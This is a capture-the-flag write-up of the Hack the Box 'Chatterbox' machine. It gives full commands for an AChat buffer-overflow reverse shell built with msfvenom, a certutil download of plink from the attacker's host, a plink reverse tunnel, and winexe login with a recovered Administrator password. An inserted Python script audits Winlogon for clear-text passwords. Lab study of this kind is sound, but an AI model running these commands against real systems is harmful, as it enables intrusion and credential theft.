Hack the Box: Chatterbox Write-up

Dylan Reuter
5 min read · Jan 25, 2021


As part of my road to the eCPPT exam, I am doing a series of write-ups on OSCP-like boxes, as suggested by @TJ_NULL on Twitter and the JSON SECS OSCP Prep List.

Chatterbox was a fun box: a buffer overflow gives us a foothold, and we escalate to Administrator by port forwarding a service that is only reachable from inside the host and authenticating to it as Administrator.

First we will start off with an Nmap scan to view open ports and services:

nmap -A -p- -T4 10.129.62.202

(Note: I am using a private instance of Hack the Box, so the machine IP will likely differ from yours.)

From the scan results, it looks like there are two ports open, 9255 and 9256, and they are running a service called AChat.

Using searchsploit, we can see if there are any known exploits for this program.

It looks like this program is vulnerable to a remote buffer overflow. I opted for the non-Metasploit version and copied it into my working directory. Inspecting the code, the author included the msfvenom command used to generate the payload. However, that payload only spawns a calculator, which is not very useful for our purposes.

Let's modify the command a little and generate new shellcode that will give us a reverse shell.

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.84 LPORT=4445 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python 

Paste the shellcode output into the exploit in place of the original payload; we also need to change the server address so it points at the target's IP.

Now that we have shellcode that spawns a reverse shell and have set the IP of the machine we are attacking, we can open a netcat listener (on port 4445 in my case) and fire the exploit off.

nc -nvlp 4445

And we get a shell on the box as user Alfred!

Now, since we are not a privileged user on this box, let's start trying to escalate our privileges. I used this Windows Privilege Escalation Guide and started going down the list looking for low-hanging fruit.

As I went through the section on searching for passwords, querying the Windows autologon registry key turned up something interesting:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

It looks like we just found Alfred's password, stored in clear text in the Winlogon key!
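The finding above is worth turning into a repeatable check. The following is an added example, not code from the write-up: it parses the text that the reg query command above prints and flags a clear-text DefaultPassword (readable by any local user) or an AutoAdminLogon that relies on an LSA secret. The sample dump is constructed; the domain and password values are placeholders, and the regex assumes reg query's standard four-space indented value lines.

```python
import re

# Constructed sample of `reg query "HKLM\...\Winlogon"` output; the
# domain and password values are placeholders, not from a real host.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    Alfred
    DefaultDomainName    REG_SZ    EXAMPLE-DOMAIN
    DefaultPassword    REG_SZ    Placeholder-Pass-123
    Shell    REG_SZ    explorer.exe
"""

# One value line of reg query output: 4-space indent, name, type, data.
VALUE_LINE = re.compile(r"^\s{4}(\S+)\s+(REG_\w+)\s*(.*)$")


def parse_reg_query(text):
    """Return {value_name: data} for the value lines of a reg query dump."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, _reg_type, data = m.groups()
            values[name] = data.strip()
    return values


def audit_autologon(values):
    """Return a list of findings; an empty list means nothing to fix."""
    findings = []
    enabled = values.get("AutoAdminLogon", "0") == "1"
    user = values.get("DefaultUserName", "<unset>")
    if values.get("DefaultPassword"):
        # HKLM\...\Winlogon is world-readable, so this is a clear-text
        # credential disclosure whether or not autologon is enabled.
        findings.append(f"DefaultPassword for {user} is stored in clear text; "
                        "delete the value (use Sysinternals Autologon, which "
                        "stores it as an LSA secret, if autologon is required)")
    if enabled and not values.get("DefaultPassword"):
        findings.append(f"AutoAdminLogon=1 for {user} without DefaultPassword; "
                        "the password is in the LSA secret 'DefaultPassword' "
                        "(still recoverable by a local administrator)")
    return findings


if __name__ == "__main__":
    for finding in audit_autologon(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("FINDING:", finding)
```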

Next, I looked at all the listening services on the box with netstat, which showed something interesting as well.

netstat -ano

During our Nmap scan, ports 9255 and 9256 were the only ones showing as open. But here, 139 is listening as well, and so are 135 and 445. The only problem is that these ports are only reachable from the host itself, not from our attacking machine. We will have to forward a port so that we can connect to it from our attacker machine.

To do this we can use Plink, which you can download here (make sure to download the 32-bit version).

Once it's downloaded, we need to get it onto the victim machine. From inside Alfred's home directory (since we have write access there) we can use Python to run an HTTP server on our machine and use certutil on the victim to download the file.

On the Kali machine: python3 -m http.server

On the victim machine: certutil -urlcache -f http://<your_ip>:8000/plink.exe plink.exe

Now that everything is in place on the victim machine, we need to get our Kali machine in order. First, we need to make sure we have an SSH server running.

If you don't have SSH installed, you can do so with apt install ssh, and make sure it's started with service ssh start.

Next, we need to edit /etc/ssh/sshd_config and change PermitRootLogin to "yes".

I also changed the SSH port to 2222 instead of 22 because Hack the Box did not like connecting on port 22 for some reason.

Once we have those settings changed, reload the SSH config with service ssh reload.

Now that that's all squared away, we will use Plink to connect back to our Kali machine from the victim machine, forwarding port 445 so we can connect to it.

plink.exe -P 2222 -l root -pw toor 10.10.14.84 -R 445:127.0.0.1:445

We have now essentially logged in to the Kali machine from the victim machine, and in doing so made the victim's port 445 available on our Kali machine's loopback, which we can confirm with netstat.

Now, Kali gives us a way to execute Windows commands remotely with winexe, which we will use to authenticate as Administrator using the password we discovered earlier and launch a command prompt.

winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"

And we get a shell as Administrator!


Written by Dylan Reuter

Software Engineer and ethical hacker. Currently in Austin, TX
